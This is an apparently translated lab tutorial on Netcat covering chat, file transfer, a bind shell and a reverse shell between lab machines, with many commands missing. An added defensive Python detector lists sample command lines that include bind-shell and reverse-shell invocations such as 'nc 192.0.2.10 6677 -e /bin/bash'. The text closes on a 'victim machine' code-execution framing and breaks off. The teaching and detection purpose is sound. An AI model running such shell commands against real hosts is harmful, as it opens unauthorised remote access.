Introduction to using Netcat
connections using TCP or UDP; this dual functionality suggests that Netcat runs in two modes: “client” and “server”. Netcat is designed to be a dependable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can create almost any kind of connection you would need and has a number of built-in capabilities.
Its list of features includes port scanning, file transfer and port listening, and it can be used as a backdoor.
This lab needs two machines: one running BackTrack 3 and the other running Windows XP.
Listening on a TCP/UDP port with Netcat is useful for debugging client network applications, or otherwise receiving a TCP/UDP network connection.
Let's try implementing a simple chat using Netcat.
To get familiar with Netcat's options, you can type
From BackTrack: to listen on port 50000 and accept incoming connections on this port, type:
Check that port 50000 is indeed listening, using netstat.
You will see
listening on [any] 50000 ...
This IP is the IP address of the BackTrack machine.
able to run this command.
After the connection is established, we can start chatting, as shown in the figures.
Netcat can also be used to transfer files from one computer to another. This
applies to text and binary files.
In order to send a file from Computer 2 to Computer 1, try the following:
From BackTrack: we set up Netcat to listen for and accept the connection
On the Windows machine we create a text file test.txt; then we connect to
The connection will be established and the file will be transferred to BackTrack, as shown in the figures below.
From BackTrack: check that the file was transferred correctly, as shown in
Checking that the file was transferred correctly
One of Netcat's neat features is command redirection. This means that Netcat can take an executable and redirect its input, output and error streams to a TCP/UDP port, rather than to the default console.
Take for example the cmd.exe executable. By redirecting the stdin/stdout/stderr
to the network, we can bind cmd.exe to a local port. Anyone connecting to this
port will be presented with a command prompt belonging to this computer.
; so that
Anyone connecting to port 9999 on this machine will be presented with a command prompt, with the permissions that nc was run with, as shown in the figure below.
From Windows: type
to connect to the other machine, which is listening on port 9999, as illustrated in the figure; after the connection is established you will be presented with the shell of BackTrack.
Now we can use any available command as if we were in front of the remote PC (for example, try ifconfig, date, cal and so on).
After the connection: trying ifconfig and date on the victim machine
Another interesting Netcat feature is the ability to send a command shell to a listening host. So in this situation, although Alice cannot bind a port to cmd.exe locally on her computer and expect Bob to connect, she can send her command prompt to Bob's machine.
; now Windows is listening on port 6677 and waiting for an incoming connection.
; now you try to connect to the Windows machine and send your shell (the BackTrack shell) to it.
I executed some commands, like date. Then I turned off BackTrack by typing the init 0 command.
The figures below show this process before and after the connection from the remote computer running Windows XP.
Windows XP waits for a connection on port 6677; after the connection is established, the BackTrack shell is sent back to XP
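Both shell-redirection forms above, a shell bound to a local port and a shell sent to a remote listener, leave a recognisable trace in the Netcat command line, which is what a defender on either machine would look for. The following script is an added example and is not part of the lab; the process command lines in it are constructed, and it keys on the -e/--exec/--sh-exec options that implement Netcat's command redirection.

```python
"""Classify Netcat command lines: plain listener, client, bind shell, or reverse shell.

Added example, not part of the lab. SAMPLE_PROCESSES is constructed sample data
that mirrors the lab's ports (50000 chat, 9999 bind shell, 6677 reverse shell).
"""

# Common names of the Netcat binary on Linux and Windows.
NC_BINARIES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd",
               "nc.exe", "ncat.exe"}
# Options that redirect a program's stdin/stdout/stderr to the socket.
EXEC_SHORT = {"e"}
EXEC_LONG = {"--exec", "--sh-exec"}

SAMPLE_PROCESSES = [
    "nc -l -p 50000",                   # chat / file-transfer listener
    "nc -l -p 9999 -e /bin/bash",       # shell exposed on a local port (bind shell)
    "nc.exe -l -p 6677",                # Windows side waiting for an incoming shell
    "nc 192.0.2.10 6677 -e /bin/bash",  # shell pushed to that listener (reverse shell)
    "ncat --exec cmd.exe -l 9999",      # same bind shell in ncat's long-option form
    "nc -zv 192.0.2.10 20-80",          # port scan: no listener, no exec
    "ssh admin@192.0.2.10",             # unrelated process
]


def classify(cmdline):
    """Return None for non-Netcat processes, otherwise one of
    'listener', 'client', 'bind_shell' or 'reverse_shell'."""
    argv = cmdline.split()  # whitespace split is enough for these command lines
    if not argv:
        return None
    binary = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if binary not in NC_BINARIES:
        return None
    short_flags, long_flags = set(), set()
    for tok in argv[1:]:
        if tok.startswith("--"):
            long_flags.add(tok.split("=", 1)[0])
        elif tok.startswith("-") and len(tok) > 1:
            short_flags.update(tok[1:])  # also covers bundled forms such as -lvp
    listening = "l" in short_flags or "--listen" in long_flags
    executes = bool(short_flags & EXEC_SHORT) or bool(long_flags & EXEC_LONG)
    if executes:
        return "bind_shell" if listening else "reverse_shell"
    return "listener" if listening else "client"


def shell_findings(processes):
    """Return (cmdline, verdict) for each process that redirects a shell over the network."""
    findings = []
    for cmdline in processes:
        verdict = classify(cmdline)
        if verdict in ("bind_shell", "reverse_shell"):
            findings.append((cmdline, verdict))
    return findings


if __name__ == "__main__":
    for cmdline, verdict in shell_findings(SAMPLE_PROCESSES):
        print(f"{verdict:13s} {cmdline}")
```

On a real host the same function would be fed the command lines from ps or the Windows process list instead of the constructed sample.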
Netcat has other nice features and uses, such as simple sniffing abilities, port redirection and others, which you can learn about if you are interested.
Now, how do I get Netcat to run on the victim machine without remote user intervention? The answer to this question is simply “remote code execution”. Ninety percent of attack vectors can be summarized with the pair of words “code execution”. For example, attacks such as buffer overflows, SQL injection, file inclusion, client-side attacks and Trojan horses all aim to result in “code execution” on the victim machine. A simple use of this will be presented in the virus and Trojan